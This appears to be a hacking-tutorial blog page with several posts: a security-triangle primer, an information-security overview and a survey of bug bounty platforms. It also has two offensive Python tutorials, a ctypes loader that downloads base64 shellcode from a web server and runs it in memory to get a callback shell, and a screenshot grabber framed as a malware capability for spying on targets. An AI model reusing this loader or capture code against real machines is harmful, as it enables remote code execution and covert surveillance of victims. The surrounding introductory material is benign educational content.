For Beginners

2. The Security Triangle (Security Model)

December 31, 2021 by BlackHammer 5 Comments

[Security Triangle CIA ] The Security, Functionality, and Usability Triangle And also known as CIA Triangle confidentiality, integrity, and availability are Explained in Brief. These are the three factors of the triangle which are known as the security triangle. In the Domain of Cyber Security { Security Triangle CIA } Plays a very important role from being a victim of Cyber Attack So, Here You will Get Full Idea of Security Triangle CIA .

The Security, Functionality, and Usability Triangle

Technology is evolving at an unprecedented rate. As a result, new products that are reaching the market focus more on ease-of-use than on secure computing.

Though technology was originally developed for “honest” research and academic purposes, it has not evolved at the same pace as users’ proficiency.

Moreover, in this evolution, system designers often overlook vulnerabilities during the intended deployment of the system. However, adding more built-in default security mechanisms allows users more competence.

Also Read: 1.Information Security Overview

It is becoming difficult for system administrators and system security professionals to allocate resources, exclusively for securing systems, with the augmented use of computers for an increasing number of routine activities.

This includes the time needed to check log files, detect vulnerabilities, and apply security update patches.

As routine activities consume system administrators’ time, leaving less time for vigilant administration, there is little time to deploy measures and secure computing resources on a regular and innovative basis.

This fact has increased the demand for dedicated security professionals to constantly monitor and defend ICT (Information and Communication Technology) resources.

Originally, to “hack” meant to possess extraordinary computer skills to explore hidden features of computer systems. In the context of Information security, hacking is defined as the exploitation of vulnerabilities of computer systems and networks and requires great proficiency.

However, today there are automated tools and codes available on the Internet that make it possible for anyone, who possesses the will, to succeed at hacking. However, mere compromise of system security does not denote hacking success.

Also, Read 3. Security Threats and Attack Vectors

There are websites that insist on “taking back the Internet” as well as people who believe that they are doing everyone a favor by posting details of their exploits. In reality, doing so serves to hamper the skill level required to become a successful attacker.

The ease with which system vulnerabilities can be exploited has increased while the knowledge curve required to perform such exploits has decreased. The concept of the elite “super attacker” is an illusion.

However, the fast-evolving genre of “script kiddies” is largely comprised of lesser-skilled individuals having second-hand knowledge of performing exploits. One of the main impediments contributing to the growth of security Infrastructure Iles in the unwillingness of exploited or compromised victims to report such incidents for fear of losing the goodwill and faith of their employees, customers, or partners, and/or of losing market share.

The trend of information assets influencing the market has seen more companies thinking twice before reporting incidents to law enforcement officials for fear of “bad press” and negative publicity.

The increasingly networked environment, with companies often using their websites as single points of contact across geographical boundaries, makes it critical for administrators to take countermeasures to prevent exploits that can result in data loss. This is why corporations need to invest in security measures to protect their information assets.

Level of security In any system can be defined by the strength of three components:

Functionality: The set of features provided by the system.
Usability: The GUI components used to design the system for ease of use.
Security: Restrictions Imposed on accessing the components of the system.

Also Read: What Is Honeypot? Trap For Hackers !!

The relationship between these three components Is demonstrated by using a triangle because an increase or decrease in any one of the component automatically affects the other two components. Moving the ball towards any of the three components means decreasing the intensity of the other two components.

The diagram in the slide represents the relationship between functionality, usability, and security. For example, as shown in the slide above, if the ball moves towards Security it means increased security and decreased Functionality and Usability.

If the ball is in the center of the triangle, then all the three components are balanced. If the ball moves towards usability it means an increased Usability and decreased Functionality as well as Security. For any implementation of security controls, all three components have to be considered carefully and balanced to get acceptable functionality and usability with acceptable security.

That’s it for today the next topic is in the next blog

-Ajinkya Kadam

1. Information Security Overview

December 31, 2021 by BlackHammer 2 Comments

In this article, we will tell you about “What are the Information Security and some basic things about it”

Information security refers to the protection or safeguard of information and information system that use, store, and transmit information from unauthorized accesses, disclosure, alterations, and destructions.

Also, Read 2. The Security Triangle (Security Model)

Information is a critical asset that organizations need to secure. If sensitive information falls in the wrong hands, then the respective organization may suffer huge losses in terms such as critical information resources, let us start with an overview of information security.

This section covers various statistics, threat predictions, and essential terminology pertaining to information security, elements of information security, as well as the security, functionality, and usability triangle.

Nowadays information security is the best and also the worst part of the organization nowadays sometimes it is very difficult to protect the information from the black hat hackers.

Also, Read 3. Security Threats and Attack Vectors

It has some Essential Terminology which is the following

Hack Value
Vulnerability
Exploit
Payload
Zero-day Attack
Daisy Chaining
Doxing
Bot

Some Basic Elements of Information Security

Confidentiality
Integrity
Availability
Authenticity
Non-Repudiation

NOTE: “If you need brief information about this term you can comment below with your email address we will definitely help you”

Also Read: What Is Honeypot? Trap For Hackers !!

“The next article is more interesting so stay tuned with us”

Ajinkya Kadam

Top 10 High Paying Bug Bounty Program In 2020

December 8, 2021 by BlackHammer 1 Comment

What Is Bug Bounty Program

A Bug Bounty program is a deal offered by many websites, organizations and software developers by which individuals can receive recognition and compensation for reporting bugs, especially those pertaining to security exploits and vulnerabilities.These programs allow the developers to discover and resolve bugs before the general public is aware of them, preventing incidents of widespread abuse. Bug bounty programs have been implemented by a large number of organizations, including Mozilla, Facebook, Yahoo!, Google, Reddit, Square, Microsoft,and the Internet bug bounty.

Bugcrowd

Bugcrowd has a standard sign-up process and doesn’t require any proof of experience to become a researcher. You can choose to make your profile public (so people can see the kudos points you’ve accumulated and general stats about your involvement) or keep it private. Your page shows your rank, how many points you’ve accumulated, how many submissions you’ve made over time, and the accuracy of those submissions. It also displays the average severity of the vulnerabilities you’ve had rewarded, on a scale of low-moderate-high- critical.

Bugcrowd also maintains a system for classifying vulnerabilities, called the Vulnerability Rating Taxonomy, in an effort to further bolster transparency and communication, as well as to contribute valuable and actionable content to the bug bounty community. For researchers specifically, the company contends the VRT help[s] program participants save valuable time and effort in their quest to make bounty targets more secure, helping them identify which types of high-value bugs they have overlooked.

Astute researchers will often specialize their skillset to become proficient at detecting a handful of bugs. As you work through the exercises and think about which strategies you’d like to dedicate time to, resources such as the VRT can help you triangulate that perfect intersection of effort and reward.

Bugcrowd uses metrics about your behavior, pulled from the last 90 days, to determine which researchers to invite to private bounty programs. These private programs are opened to a limited set of researchers, who are given a window of time to in which find vulnerabilities. These private programs are great because they mean fewer researchers combing through a particular site, and therefore more chances for you to discover bugs.

The company also provides a useful service where, every time you log in, Sometimes program guidelines will ask you to create a testing account using this email so the participating company can monitor researchers, but regardless, they’re a great resource. Because it’s a Gmail service, you can also change the address if you need to spin up multiple accounts.

You can find a wide spectrum of businesses on Bugcrowd, covering every size and a variety of revenue models. The targets trend towards web applications, but there is also a smattering of mobile apps and the odd alternative listing.

HackerOne

HackerOne is a similar platform d it has its own point system (reputation) and also calculates a variety of metrics that it uses as the basis for its Leaderboard and for invitations to its own private programs. Like Bugcrowd, it also has a bug bounty policy for itself d if you find a vulnerability in one of its sites or apps, you’re entitled to a reward. Interestingly though, you might still be entitled to a reward even if you don’t discover a bug. From their site:

“HackerOne is interested in your research on our systems, regardless of whether you found a security vulnerability. If you have found yourself looking at a particular feature on one of our assets but didn’t find anything, please submit a report that describes all the different things you tried and failed. We may reward you for substantial research performed on assets under our bug bounty policy.”

This is an usual policy that still makes sense: providing a detailed list of everything that worked is its own audit of the company’s resources, even if it doesn’t cover any vulnerable areas. HackerOne and Bugcrowd both have a similar breadth of different companies, with different products, business models, and security needs. HackerOne does have a few notable companies that are exclusive to its platform, most notably Twitter, but generally the offerings are very similar.

Vulnerability Lab

Vulnerability lab is a submission-and-disclosure platform that uses a team of in-house experts to vet high-profile vulnerabilities, but also accepts submissions on less critical/lower-profile bugs. One of their site’s features actually involves receiving reports for critical vulnerabilities that a researcher might not want to submit directly and acting as a point of contact and third-party broker for the researcher with the affected company.

Like HackerOne, it publicly discloses bug reports after a window of time has elapsed, and is a useful reference for beginners looking to better understand the form of bug reports, and methods for discovering and reporting common vulnerabilities. Their public index of vulnerabilities is also tagged with the type of system each bug was found on, making it a nice resource when you’re trying to get a sense of application-specific problems.

BountyFactory

BountyFactory, which touts itself as the first European bug bounty platform that relies on European rules and legislation, is run by the larger YesWeH4ck group, an Infosec recruiting company founded in 2013 that’s made up of a bug bounty platform, a job board (YesWeH4ck Jobs), a coordinated vulnerability-disclosure platform (ZeroDisclo), and an aggregation of all public bug bounty programs (FireBounty).

Like Bugcrowd and HackerOne, BountyFactory has a scoring system, leaderboard, and both public and private programs, for which it extends a limited number of invitations. Because of its European orientation, BountyFactory is great for finding companies, such as OVH, Orange, and Qwant, that aren’t on the popular, American-run alternatives. Many of its clients are straight out of the French start-up scene.

Synack

Synack relies on a completely different business model from all the other programs we’ve discussed. As a private program that prides itself on its quality and exclusivity, Synack requires more than just an email to become a researcher. The company asks for personal information, requests a video interview, initiates a background and ID check, and conducts a skills assessment to ensure their researchers are capable and responsible enough to audit programs where they might come into contact with sensitive data (one of Synack’s specialties). Fewer than 10% of applicants to their Red Team are accepted. And unlike the other programs, Synack doesn’t publish a leaderboard or any sort of researcher ranking publicly (though they do keep internal rankings as the basis for rewards and invitations to select campaigns).

Intermediaries such as Synack are great if you’re looking for more of the private program- type of engagements you’re already being invited to on Bugcrowd or HackerOne , where researchers receive exclusive, limited access to the target application. It’s also great if you need a quick payout time, or want access to the professional development materials the company only makes available to member researchers. The fact that Synack keeps its researchers’ identities secret is also a benefit, as d though adhering to the Rules of Engagement (ROE) is always important d it offers the researcher some protection from legal action by companies trying to discourage aggressive auditing, or who interpret their own RoE differently than you do.

In general, Synack is a good option if you’ve already cut your teeth on bug bounty marketplaces where the cost to join isn’t as high, and are looking to make a bigger commitment to security research. If you’re willing and able to get passed their screening process, working as part of their red team will secure you less-trafficked targets, exclusive engagements, and quicker payouts.

Company Sponsered Initiative

Company-sponsored programs are just what they sound like. It’s not just large mega-corps that have bounty programs surprising number of businesses have a process for rewarding security contributions. The size of each company can drastically effect the requirements and conditions for a reward: large companies pay top dollar for vulnerabilities, but the low-hanging fruit of those flaws will already have been picked; start-ups will have less mature applications, but probably a smaller application attack surface, assembled from a newer stack with fewer known vulnerabilities, and might want to pay for contributions in swag. Companies that are mature enough to suffer from technical debt, but also have a budget to pay rewards, are a nice fit. Sometimes, though, you’ll just have to poke around in different areas, taking your chances, to find your next vulnerability. Here are some examples of the programs offered by larger companies.

Google

Google’s program is expansive, with detailed payout structures and specific instructions for classifying different types of bug. Most of the relevant information can be found on the rewards section of their Application Security page, but Google also curates a (small) set of pentesting tutorials, with specific attention paid to finding the types of bugs and submitting the kinds of reports about them that Google wants to receive.

The articles on Bughunter University and other Google resources have different levels of applicability d some of it is just Google’s preferences, requirements, and so on d but even the more idiosyncratic sections contain best practices and wisdom that can applied to other programs and engagements. Other companies might not agree completely with their common types of non-qualifying report, but there’ll still be substantial overlap, making it a useful guide regardless of the vendor.

In addition to the materials on Bughunter University, Google is responsible for creating and maintaining a lot of great instructional applications. We’ll be using one, Google Gruyere, as part of our chapter on XSS and you can find other great resources from Google in the other tools section at the end of the book.

Facebook

Facebook has a bug bounty program with a minimum payout of $500, but as the very direct language in their responsible disclosure policy attests, they do not tolerate mucking about with production data: if you comply with the policies when reporting a security issue to Facebook, they will not initiate a lawsuit or law enforcement investigation against you in response to your report.

The amount of information available for their program is minimal. You’ll find a side-by- side example of a submission report and an improved version, with some non-qualifying vulnerabilities, but not much in the way of universal lessons or professional tips.

As the legalese signals, Facebook is very sensitive to misuse of its platform d especially given recent increased scrutiny. And because so many exploits will be aimed at affecting users, it’s critical to stop short of writing any code that could subvert an account.

Amazon

Amazon has vulnerability programs for both its e-commerce and cloud services divisions. An important point is that Amazon requires you to register and ask for permission before conducting any sort of pentesting engagement. This is critical, and a key way the company differs from some of its competitors. Instead of an open-ended participation model where, as long as you abide by the rules of engagement, you can expect immunity, Amazon enforces a permissions-first model to better contain pentesting activity and differentiate White- and Black-Hat activity.

Amazon has a multitude of white papers, blog posts, and documentation on how security works within Amazon, but less material than Facebook or Google to help with penetration testing or bug bounty participation generally.

Github

GitHub offers a bounty program that covers a wide array of its properties, including the API, enterprise app, and main rails site, with payouts ranging from $555 to $20,000 for most of those targets.

One neat feature of the GitHub program is that each participant who successfully submits a bounty receives a profile page that d in addition to showing the points they’ve accumulated, rank, and earned badges d lists their reported vulnerabilities with a short technical blurb about each one. Like the published submission reports on other platforms, any technical detail about a successfully-discovered vulnerability is an invaluable insight into winning strategies, both in general and for the site in question. And if you’re looking to parlay finding bugs into a larger career in security, profile pages such as the ones offered by GitHub, Bugcrowd, and HackerOne can be great bullet points on your resume.

Microsoft

Microsoft has a rewards program covering both its consumer-software-stable and web-app products, such as their cloud offering, Azure. The Microsoft Bounty Program site goes into detail about submission-report formatting, showing examples of both good and bad specimens, and has detailed, specific testing guidelines for every Microsoft property included. But there isn’t a deep reserve of learning material from a general pentesting perspective, and less in the way of community. Microsoft, like many other companies, has its own public leaderboard and ranking system.

Their blog is a good source for more general Infosec analysis. In one series, they provide an in-depth analysis, including source code examples, of Windows exploits used by the Shadow Brokers, the infamous hacking syndicate known to have leaked NSA hacking tools in the summer of 2016.

Also Check All Important Kali Linux Commands For Hacker With Use.

How To Make Base64 Encrypted Shellcode Using Python | ctypes

December 7, 2021 by BlackHammer Leave a Comment

What Is Shellcode

In hacking, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called “shellcode” because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode. Because the function of a payload is not limited to merely spawning a shell, some have suggested that the name shellcode is insufficient. However, attempts at replacing the term have not gained wide acceptance. Shellcode is commonly written in machine code.

Pythonic Shellcode Execution

There might come a time when you want to be able to interact with one of your target machines, or use a juicy new exploit module from your favorite penetration testing or exploit framework. This typically—though not always requires some form of shellcode execution. In order to execute raw shellcode, we simply need to create a buffer in memory, and using the ctypes module, create a function pointer to that memory and call the func- tion. In our case, we’re going to use urllib2 to grab the shellcode from a web server in base64 format and then execute it.

Let’s get started! Open up shell_exec.py and enter the following code:

import urllib2
import ctypes
import base64
# retrieve the shellcode from our web server
url = "http://localhost:8000/shellcode.bin"
response = urllib2.urlopen(url) 
# decode the shellcode from base64 
shellcode = base64.b64decode(response.read())

How awesome is that? We kick it off by retrieving our base64-encoded shellcode from our web server.

# create a buffer in memory
 shellcode_buffer = ctypes.create_string_buffer(shellcode, len(shellcode))

We then allocate a buffer to hold the shellcode after we’ve decoded it.

# create a function pointer to our shellcode
 shellcode_func = ctypes.cast(shellcode_buffer, ctypes.CFUNCTYPE(ctypes.c_void_p))

The ctypes cast function allows us to cast the buffer to act like a function pointer so that we can call our shell- code like we would call any normal Python function.

# call our shellcode
 shellcode_func()

We finish it up by calling our function pointer, which then causes the shellcode to execute.

Let’s Take It For A Spin

You can handcode some shellcode or use your favorite pentesting frame- work like CANVAS or Metasploit3 to generate it for you. I picked some Windows x86 callback shellcode for CANVAS in my case. Store the raw shellcode (not the string buffer!) in /tmp/shellcode.raw on your Linux machine and run the following:

thedarktech$ base64 -i shellcode.raw > shellcode.bin
thedarktech$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...

We simply base64-encoded the shellcode using the standard Linux command line. The next little trick uses the SimpleHTTPServer module to treat your current working directory (in our case, /tmp/) as its web root. Any requests for files will be served automatically for you. Now drop your shell_exec.py script in your Windows VM and execute it. You should see the following in your Linux terminal:

192.168.112.130 - - [12/Jan/2014 21:36:30] "GET /shellcode.bin HTTP/1.1" 200

This indicates that your script has retrieved the shellcode from the simple web server that you set up using the SimpleHTTPServer module. If all goes well, you’ll receive a shell back to your framework, and have popped calc.exe, or displayed a message box or whatever your shellcode was compiled for.

Also Check How To Take Screenshot In Windows Computer Using Python.

How To Take Screenshot In Windows Computer Using Python

December 6, 2021 by BlackHammer 1 Comment

Most pieces of malware and penetration testing frameworks include the capability to take screenshots against the remote target. This can help capture images, video frames, or other sensitive data that you might not see with a packet capture or keylogger. Thankfully, we can use the PyWin32 package to make native calls to the Windows API to grab them.

A screenshot grabber will use the Windows Graphics Device Interface (GDI) to determine necessary properties such as the total screen size, and to grab the image. Some screenshot software will only grab a picture of the currently active window or application, but in our case we want the entire screen.

Let’s get started. Crack open screenshotter.py and drop in the following code:

import win32gui
import win32ui
import win32con
import win32api
# grab a handle to the main desktop window
 hdesktop = win32gui.GetDesktopWindow()

Let’s review what this little script does. First we acquire a handle to the entire desktop, which includes the entire viewable area across multiple monitors.

# determine the size of all monitors in pixels
 width = win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN) 
height = win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)
left = win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)
top = win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)

We then determine the size of the screen(s) so that we know the dimensions required for the screenshot.

# create a device context
 desktop_dc = win32gui.GetWindowDC(hdesktop) 
img_dc = win32ui.CreateDCFromHandle(desktop_dc)

We create a device context using the GetWindowDC function call and pass in a handle to our desktop.

# create a memory based device context
 mem_dc = img_dc.CreateCompatibleDC()

Next we need to create a memory-based device context where we will store our image capture until we store the bitmap bytes to a file.

# create a bitmap object
 screenshot = win32ui.CreateBitmap() 
screenshot.CreateCompatibleBitmap(img_dc, width, height)
mem_dc.SelectObject(screenshot)

We then create a bitmap object that is set to the device context of our desktop. The SelectObject call then sets the memory-based device context to point at the bitmap object that we’re capturing.

# copy the screen into our memory device context
 mem_dc.BitBlt((0, 0), (width, height), img_dc, (left, top), win32con.SRCCOPY)

We use the BitBlt function to take a bit-for-bit copy of the desktop image and store it in the memory- based context. Think of this as a memcpy call for GDI objects.

# save the bitmap to a file 
screenshot.SaveBitmapFile(mem_dc, 'c:\\WINDOWS\\Temp\\screenshot.bmp')
# free our objects
mem_dc.DeleteDC()
win32gui.DeleteObject(screenshot.GetHandle())

The final step is to dump this image to disk.

This script is easy to test: Just run it from the command line and check the C:\WINDOWS\Temp directory for your screenshot.bmp file.

Let’s move on to executing shellcode in the next article.

Also Check How To Make A Keylogger For Windows In Python.

Packet Sniffer On Windows And Linux Using Python | For Hackers